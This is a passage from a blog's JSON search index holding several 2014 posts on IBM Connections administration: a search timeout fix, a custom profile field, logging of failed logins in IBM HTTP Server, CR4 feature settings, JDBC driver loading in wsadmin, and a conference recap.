had set it to 0.15 seconds and this is too less for activities, all other applications were ok. After reading the document i remembered setting this value and increased it to 15000 and voila the search builds perfectly and all errors are gone.\nI learned again that i should read the documentation and that search/serverStatus does not validate the variables, it only checks that that the variable is present. Maybe this should be made as a feature request?\nIn the trace you see login data and that search can’t access the url, but not that the request timed out.\n","excerpt":"\u003cp\u003eIBM released a tech document on friday with title:\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21672340\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003eSearch\nfails with the error CLFRW0060E: Input-output exception \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eThis document solves one of my problems i had in a demo environment\nsince two weeks. I traced the environment, checked j2ee roles,\nreinstalled CR3 and 4, redeployed search and activities, but i always\ngot an error, when the search wants to access the activities seed list.\u003c/p\u003e\n\u003cp\u003eSo what happened? I want to show the /search/serverStatus page in a\ncourse and for this i want to remove all warnings and errors. When you\ndon’t set SEARCH_SEEDLIST_TIMEOUT, you get a warning, that the variable\nis not set.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-05-11-search-fails-with-the-error-clfrw0060e-input-output-exception/","title":"Search fails with the error CLFRW0060E: Input-output exception"},{"body":"Adding a custom field to IBM Connections Profiles is great documented in “https://www.slideshare.net/palmke/show301-make-your-ibm-connections-deployment-your-own-customize-it-30628456[SHOW301: Make Your IBM® Connections Deployment Your Own: Customize It!]” the Connect 2014 session of Wannes Rams and Klaus Bild . Thanks to them for this great collection of customizing tipps.\nIn my case the bundle name is “stoeps” and the custom field i want to add is “twitterId”.\nlotusconnections-config.xml \u0026lt;resources\u0026gt; \u0026lt;!-- Custom strings for field labels --\u0026gt; \u0026lt;widgetBundle name=\u0026#34;local.stoeps.profiles.strings.uiLabels\u0026#34; prefix=\u0026#34;stoeps\u0026#34;/\u0026gt; \u0026lt;/resources\u0026gt; local.stoeps.profiles.strings.uilabels.properties # extension property field labels label.stoeps.twitterId=Twitter Id: profiles-types.xml \u0026lt;property\u0026gt; \u0026lt;!-- Custom field for Twitter ID --\u0026gt; \u0026lt;ref\u0026gt;twitterId\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;false\u0026lt;/hidden\u0026gt; \u0026lt;/property\u0026gt; profiles-config.xml Checkout profiles-config.xml and change following points:\n\u0026lt;profileDataModels\u0026gt; \u0026lt;profileExtensionAttributes\u0026gt; ... \u0026lt;simpleAttribute extensionId=\u0026#34;twitterId\u0026#34; length=\u0026#34;180 /\u0026gt; \u0026lt;/profileExtensionAttributes\u0026gt; \u0026lt;/profileDataModels\u0026gt; Uncomment the extensions templateData:\n\u0026lt;template name=\u0026#34;businessCardInfo\u0026#34;\u0026gt; \u0026lt;templateDataModel\u0026gt; \u0026lt;!-- include if you render workLocation, organization, department information --\u0026gt; \u0026lt;templateData\u0026gt;codes\u0026lt;/templateData\u0026gt; \u0026lt;!-- include if any only if you render profile extension fields in the template --\u0026gt; \u0026lt;templateData\u0026gt;extensions\u0026lt;/templateData\u0026gt;\u0026lt;!-- activated for twitterId in searchResult --\u0026gt; \u0026lt;!-- include if you render secretary name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;secretary\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;!-- include if you render manager name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;manager\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;!-- include if you render information dependent upon two users being connected --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;connection\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;/templateDataModel\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;template name=\u0026#34;searchResults\u0026#34;\u0026gt; \u0026lt;templateDataModel\u0026gt; \u0026lt;!-- include if you render workLocation, organization, department information --\u0026gt; \u0026lt;templateData\u0026gt;codes\u0026lt;/templateData\u0026gt; \u0026lt;!-- include if any only if you render profile extension fields in the template --\u0026gt; \u0026lt;templateData\u0026gt;extensions\u0026lt;/templateData\u0026gt;\u0026lt;!-- activated for twitterId in searchResult --\u0026gt; \u0026lt;!-- include if you render secretary name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;secretary\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;!-- include if you render manager name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;manager\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;/templateDataModel\u0026gt; \u0026lt;/template\u0026gt; ... \u0026lt;searchLayout\u0026gt; ... \u0026lt;!-- custom field in searchResult --\u0026gt; \u0026lt;extensionAttribute showLabel=\u0026#34;false\u0026#34; labelKey=\u0026#34;label.stoeps.twitterId\u0026#34; bundleIdRef=\u0026#34;stoeps\u0026#34; extensionIdRef=\u0026#34;twitterId\u0026#34;/\u0026gt; \u0026lt;/searchLayout\u0026gt; Now you must add following line to :\nprofilesEdit.ftl I added following line within \u0026lt;@util.renderSection sectionLabel=”contactInformation”\u0026gt;:\n\u0026lt;@util.renderFormControl ref=\u0026#34;twitterId\u0026#34; singleColumnLayout=false nlsBundle=\u0026#34;stoeps\u0026#34; nlsKey=\u0026#34;label.stoeps.twitterId\u0026#34;/\u0026gt; profilesDetails.ftl \u0026lt;#-- Customize start --\u0026gt; \u0026lt;#-- Adding a field twitter id --\u0026gt; \u0026lt;@util.renderProperty ref=\u0026#34;twitterId\u0026#34; nlsKey=\u0026#34;label.stoeps.twitterId\u0026#34; nlsBundle=\u0026#34;stoeps\u0026#34; hideIfEmpty=true ; ref, dataId, dataKey, nlsKey, nlsBundle\u0026gt; \u0026lt;@util.renderValue ref=ref renderAs=\u0026#34;twitter\u0026#34; /\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/@util.renderProperty\u0026gt; \u0026lt;#– Customize end –\u0026gt;\nsearchResults.ftl I added following code above the renderProperty of jobResp:\n\u0026lt;@util.renderProperty ref=\u0026#34;twitterId\u0026#34; nlsKey=\u0026#34;label.stoeps.twitterId\u0026#34; nlsBundle=\u0026#34;stoeps\u0026#34; hideIfEmpty=true ; ref, dataId, dataKey, nlsKey, nlsBundle\u0026gt; \u0026lt;div\u0026gt; \u0026lt;@util.renderValue ref=ref renderAs=\u0026#34;twitter\u0026#34;/\u0026gt; \u0026lt;/strong\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/@util.renderProperty\u0026gt; renderAs comes from commonUtil.ftl, to format a URL to the Twitter Homepage.\ncommonUtil.ftl ... \u0026lt;#elseif renderAs = \u0026#34;email\u0026#34;\u0026gt; \u0026lt;a href=\u0026#34;ma\u0026amp;#105;l\u0026amp;#116;\u0026amp;#111;\u0026amp;#58;\u0026amp;#36;\u0026amp;#123;\u0026amp;#118;\u0026amp;#97;lue\u0026amp;#125;\u0026#34;\u0026gt;${value}\u0026lt;/a\u0026gt; \u0026lt;#-- customize start --\u0026gt; \u0026lt;#elseif renderAs = \u0026#34;twitter\u0026#34;\u0026gt; \u0026lt;#-- special rendering for twitter id --\u0026gt; \u0026lt;a href=\u0026#34;http://twitter.com/${value}\u0026#34; target=\u0026#34;_new\u0026#34;\u0026gt;@${value}\u0026lt;/a\u0026gt; \u0026lt;#-- customize end --\u0026gt; \u0026lt;#elseif renderAs = \u0026#34;blogUrl\u0026#34;\u0026gt; ... Result: search result Profile ","excerpt":"\u003cp\u003eAdding a custom field to IBM Connections Profiles is great documented in\n“https://www.slideshare.net/palmke/show301-make-your-ibm-connections-deployment-your-own-customize-it-30628456[SHOW301:\nMake Your IBM® Connections Deployment Your Own: Customize It!]” the\n\u003ca href=\"http://www-01.ibm.com/software/collaboration/events/connect/\" target=\"_blank\"\u003eConnect\n2014 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n session of \u003ca href=\"http://wannesrams.wordpress.com\" target=\"_blank\"\u003eWannes Rams \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus Bild \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Thanks to them for this great collection of\ncustomizing tipps.\u003c/p\u003e\n\u003cp\u003eIn my case the bundle name is “stoeps” and the custom field i want to\nadd is “twitterId”.\u003c/p\u003e\n\u003ch1 id=\"lotusconnections-configxml\"\u003elotusconnections-config.xml \u003ca href=\"#lotusconnections-configxml\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;resources\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;!-- Custom strings \u003cspan style=\"color:#859900\"\u003efor\u003c/span\u003e field labels --\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;widgetBundle \u003cspan style=\"color:#268bd2\"\u003ename\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;local.stoeps.profiles.strings.uiLabels\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eprefix\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;stoeps\u0026#34;\u003c/span\u003e/\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/resources\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"localstoepsprofilesstringsuilabelsproperties\"\u003elocal.stoeps.profiles.strings.uilabels.properties \u003ca href=\"#localstoepsprofilesstringsuilabelsproperties\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# extension property field labels\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003elabel.stoeps.twitterId=Twitter Id:\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"profiles-typesxml\"\u003eprofiles-types.xml \u003ca href=\"#profiles-typesxml\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;property\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;!-- Custom field \u003cspan style=\"color:#859900\"\u003efor\u003c/span\u003e Twitter ID --\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;ref\u0026gt;twitterId\u0026lt;/ref\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hidden\u0026gt;false\u0026lt;/hidden\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/property\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"profiles-configxml\"\u003eprofiles-config.xml \u003ca href=\"#profiles-configxml\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eCheckout profiles-config.xml and change following points:\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-04-15-customizing-ibm-connections-profiles-add-custom-field-to-searchresults/","title":"Customizing IBM Connections Profiles – Add custom field to searchResults"},{"body":"You can log login errors within IBM Http Server.\nOne way would be to get use SetEnvIf, but then you can’t get the querystring of the error page. When you type a wrong password the URL changes from https://connectionshost/application/login/ to https://connectionshost/application/login/?error=true.\nSetEnvIf Request_URI \u0026#34;/login$\u0026#34; log This set the environment variable to log, but when you read the Apache documentation you find:\nThe resource requested on the HTTP request line — generally the portion of the URL following the scheme and host portion without the query string. See the RewriteCond directive of mod_rewrite for extra information on how to match your query string\nSo we need a way to get ?error=true, with mod_rewrite we can access the query_string:\nLoadModule rewrite_module modules/mod_rewrite.so RewriteCond %{QUERY_STRING} \u0026#34;error=true\u0026#34; RewriteRule (.*) $1 [E=log:yes] CustomLog \u0026#34;D:/IBM/HTTPServer/logs/loginpage.log\u0026#34; combined env=log Now we can access the login page, type a wrong password and check the log:\n192.168.110.190 - - [15/Apr/2014:10:40:15 +0200] \u0026#34;GET /homepage/login/?error=true HTTP/1.1\u0026#34; 200 2763 \u0026#34;https://cnxwin.stoeps.local/homepage/login/?error=true\u0026#34; \u0026#34;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\u0026#34; 192.168.110.190 - - [15/Apr/2014:11:00:49 +0200] \u0026#34;GET /communities/login?error=true HTTP/1.1\u0026#34; 200 2766 \u0026#34;https://cnxwin.stoeps.local/communities/login\u0026#34; \u0026#34;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\u0026#34; 192.168.110.190 - - [15/Apr/2014:11:00:56 +0200] \u0026#34;GET /blogs/login?error=true\u0026amp;lang=en_us HTTP/1.1\u0026#34; 200 2763 \u0026#34;-\u0026#34; \u0026#34;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\u0026#34; ","excerpt":"\u003cp\u003eYou can log login errors within IBM Http Server.\u003c/p\u003e\n\u003cp\u003eOne way would be to get use SetEnvIf, but then you can’t get the\nquerystring of the error page. When you type a wrong password the URL\nchanges from \u003ccode\u003ehttps://connectionshost/application/login/\u003c/code\u003e to\n\u003ccode\u003ehttps://connectionshost/application/login/?error=true\u003c/code\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSetEnvIf Request_URI \u003cspan style=\"color:#2aa198\"\u003e\u0026#34;/login\u003c/span\u003e$\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e log\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThis set the environment variable to log, but when you read the\n\u003ca href=\"http://httpd.apache.org/docs/current/mod/mod_setenvif.html\" target=\"_blank\"\u003eApache\ndocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n you find:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe resource requested on the HTTP request line — generally the portion\nof the URL following the scheme and host portion without the query\nstring. See the RewriteCond directive of mod_rewrite for extra\ninformation on how to match your query string\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-04-15-log-login-errors-of-ibm-connections-with-ibm-http-server/","title":"Log Login Errors of IBM Connections with IBM HTTP Server"},{"body":"IBM released CR4 for IBM Connections 4.5 yesterday evening.\nYou can download CR4, TDISOL and some Cognos Updates at following links:\nFix list for IBM Connections 4.5 CR4 Updating the IBM Connections 4.5 databases to the required schema versions for Cumulative Refresh 4 (CR4) Fix Central Download Link New functions included in IBM Connections 4.5 CR4 New Functions After deploying CR4 you can enable some new features:\nHash tags in status update replies Add\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.hashtagCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; to lotusconnections-config.xml\nNow you can use hash tags in replies.\nInclude file links in status update replies Activate with:\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.attachmentCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; Now you get a add file in the reply window and you can attach one file:\nExpose activity stream search in the user interface and filter by hashtag\nActivate with:\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.social.as.hashtagSearchEnabled\u0026#34;\u0026gt;true\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; Search find hashtags in the activity stream now.\nCommunity Folders Add following code to files-config.xml:\n\u0026lt;folder\u0026gt; \u0026lt;community\u0026gt; \u0026lt;communityFolder enabled=\u0026#34;true\u0026#34;/\u0026gt; \u0026lt;/community\u0026gt; \u0026lt;/folder\u0026gt; With this feature you can add folders in the files module of your community or in the community overview.\nIt is possible to share existing folders and create new ones:\n@mentions via the activity stream API Activated by default, no additional configuration needed! I did not test this feature, but i think it is good.\nProperties section of lotusconnections-config.xml after applying CR4 To activate the new features of CR2 (nextGen Theme), CR3 (badging) and CR4 i have following settings in my lotusconnections-config.xml:\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.lconn.core.web.request.HttpRequestFilter.IECompatMode\u0026#34;\u0026gt;false\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.lconn.core.web.styles.theme.default\u0026#34;\u0026gt;gen4\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.news.badgingEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.hashtagCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.attachmentCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.social.as.hashtagSearchEnabled\u0026#34;\u0026gt;true\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; Update Luis Benitez mentions some more new features in his last blog post: Introducing File Sync for Mobile and More in IBM Connections 4.5 CR4 ","excerpt":"\u003cp\u003eIBM released CR4 for IBM Connections 4.5 yesterday evening.\u003c/p\u003e\n\u003cp\u003eYou can download CR4, TDISOL and some Cognos Updates at following links:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21666249\" target=\"_blank\"\u003eFix list for\nIBM Connections 4.5 CR4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21666250\" target=\"_blank\"\u003eUpdating the\nIBM Connections 4.5 databases to the required schema versions for\nCumulative Refresh 4 (CR4) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Lotus\u0026amp;product=ibm/Lotus/Lotus%20Connections\u0026amp;release=4.5.0.0\u0026amp;platform=All\u0026amp;function=all\u0026amp;source=fc\" target=\"_blank\"\u003eFix\nCentral Download Link \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21667272\" target=\"_blank\"\u003eNew\nfunctions included in IBM Connections 4.5 CR4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1 id=\"new-functions\"\u003eNew Functions \u003ca href=\"#new-functions\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eAfter deploying CR4 you can enable some new features:\u003c/p\u003e\n\u003ch2 id=\"hash-tags-in-status-update-replies\"\u003eHash tags in status update replies \u003ca href=\"#hash-tags-in-status-update-replies\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eAdd\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;properties\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;genericProperty \u003cspan style=\"color:#268bd2\"\u003ename\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;com.ibm.connections.ublog.hashtagCommentEnabled\u0026#34;\u003c/span\u003e\u0026gt;enabled\u0026lt;/genericProperty\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/properties\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eto lotusconnections-config.xml\u003c/p\u003e\n\u003cp\u003eNow you can use hash tags in replies.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-04-01-ibm-connections-4-5-cr4-released-new-features-are-available/","title":"IBM Connections 4.5 CR4 released – new features are available"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/bccon/","title":"BCCON"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engage.ug/","title":"Engage.ug"},{"body":"This week i attended Engage in Breda . I had a session with famous Sharon Bellamy , we covered an update of our Connect 2014 session about BP307 – Practical Solutions for Connections Administrators – Tips and Scripts for Your Daily Busines .\nI enjoyed it very much to be with lovely community guys, old and new friends. I want to thank Theo Heselman , he and his crew did and does a really great job to get us all together (350 attendees, 30 IBM Champions, 65 speakers).\nKitty and Warren Elsmore were with us again and made lovely copies of ourself in lego. Thanks to you too.\nAfter closing session We4It has organized a shuttle to Hamburg. The travel was really good organized and we enjoyed soft drinks, beer and even a great meal at a rainy stop in the middle of the way.\nOli Heinz made great pictures at Engage and Bccon. He also saves this unforgetable experience:\nWell prepared we arrived in Hamburg to be at the bcconde a new usergroup event in Germany. About 100 people were there, to see sessions, talk with speakers and sponsors. 7 of 30 IBM Champions which where in Breda made it to come to Hamburg and 6 of us had a short night there.\nSession with Klaus Bild was the first time presentating the Connect slides in german and doing a session with Klaus. I see forward to make some new sessions with him.\nOn thursday i made a review of a IBM Connections environment in Hamburg. Nothing special, but some interesting effects. Main problem in my eyes is the internet proxy used here.\nFlight back wasn’t special, but again i had to wait half an hour for suitcase at the airport. Finally i arrived at home at March 21st, 00:30.\nThere is only one word to describe this week:\nAWESOME!\n","excerpt":"\u003cp\u003eThis week i attended \u003ca href=\"http://www.engage.ug\" target=\"_blank\"\u003eEngage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\n\u003ca href=\"http://www.chasse.nl\" target=\"_blank\"\u003eBreda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I had a session with famous\n\u003ca href=\"http://dilf.me.uk/socialshazza/\" target=\"_blank\"\u003eSharon Bellamy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, we covered an update of\nour Connect 2014 session about\n\u003ca href=\"https://share.stoeps.de/2014-01-27-bp307.pdf\" target=\"_blank\"\u003eBP307\n– Practical Solutions for Connections Administrators – Tips and Scripts\nfor Your Daily Busines \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI enjoyed it very much to be with lovely community guys, old and new\nfriends. I want to thank \u003ca href=\"http://www.xceed.be\" target=\"_blank\"\u003eTheo Heselman \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, he and his\ncrew did and does a really great job to get us all together (350\nattendees, 30 IBM Champions, 65 speakers).\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"https://farm8.staticflickr.com/7436/13310050225_e5eb24cc80.jpg\" alt=\"13310050225 e5eb24cc80\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://warrenelsmore.com/\" target=\"_blank\"\u003eKitty and Warren Elsmore \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n were with us again\nand made lovely copies of ourself in lego. Thanks to you too.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-03-21-some-words-after-engage-and-bcconde/","title":"Some Words After Engage And Bcconde"},{"body":"It was little bit quiet here after Connect 2014. I had lots of projects and no time to add new scripts or even do bug fixing.\nI promised at Connect, that i will fix the JDBC drivers, that they will load on Windows too. See cnxMemberCheckExIDByEmail.py as an example.\nLoading JDBC Drivers within jython scripts Jan Riedel sent me a solution for SLES and i tested his proposal today within Windows. He points me in the right direction, i mustn’t load the path or jar within the script, it is better to load on starting wsadmin. You have to add the JDBC Driver path to WAS_EXT_DIRS.\nI see two ways here:\nChange setupCmdLine.sh|bat (Update) I don’t like to change setupCmdLine directly, because i don’t want to load the driver everytime i start wsadmin or WebSphere, but you can add your JDBC path to the line\nset WAS_EXT_DIRS=….;c:(Windows)\nexport WAS_EXT_DIRS=….:/opt/IBM/JDBC (Linux)\nPlease do not change your setupCmdLine in this way. I had errors on using Connections updateInstaller, when i use it! Use WAS_USER_SCRIPT!\nAdd a WAS_USER_SCRIPT I create a batch|shell script with following content.\nwasuserscript.sh Create the script in $WAS_HOME/profiles/Dmgr01/bin and make it executable.\nexport WAS_EXT_DIRS=$WAS_EXT_DIRS:/opt/IBM/JDBC wasuserscript.bat Create batch in %WAS_HOME%01\nset WAS_EXT_DIRS=%WAS_EXT_DIRS;c:\\IBM\\JDBC Now it is enough to set the environment variable WAS_USER_SCRIPT, then the jdbc driver will be loaded on wsadmin start. So when you want to load cnxmenu.py or one of the scripts using JDBC ( cnxMemberCheckExIDByEmail.py, cnxMemberDeactAndActByEmail.py) simply set the WAS_USER_SCRIPT variable in your operating system, terminal or console.\nexport WAS_USER_SCRIPT=/opt/IBM/.../wasuserscript.sh or\nset WAS_USER_SCRIPT=C:\\....\\wasuserscript.bat Thanks to Victor Toal for your script testing and bug reporting!\nNew scripts I added some scripts for special j2ee roles to the github repository :\ncfgJ2EERoleGlobalModerator.py\ncfgJ2EERoleMetricsReader.py\ncfgJ2EERoleMetricsReportRun.py\ncfgJ2EERoleSocialMail.py\nThese scripts set consistent the roles mentioned in the file name. So you can enable or disable Socialmail integration, Metrics or Moderation.\nNext weeks, next events Next events i will attend are: Engage in Breda , BCCON in Hamburg and Social Connections VI in Prag.\nAt Engage i will speak with my friend Sharon Bellamy about Scripting .\nAt BCCON i will be with my swiss friend and scripting colleague Klaus Bild , we will do the Script show in german .\nI plan a session for SocCon VI too, hope i will get a slot there.\n","excerpt":"\u003cp\u003eIt was little bit quiet here after Connect 2014. I had lots of projects\nand no time to add new scripts or even do bug fixing.\u003c/p\u003e\n\u003cp\u003eI promised at Connect, that i will fix the JDBC drivers, that they will\nload on Windows too. See\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting/blob/master/WebSphere/cnxMemberCheckExIDByEmail.py\" target=\"_blank\"\u003ecnxMemberCheckExIDByEmail.py \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nas an example.\u003c/p\u003e\n\u003ch1 id=\"loading-jdbc-drivers-within-jython-scripts\"\u003eLoading JDBC Drivers within jython scripts \u003ca href=\"#loading-jdbc-drivers-within-jython-scripts\"\u003e\u003ci class=\"las la-link 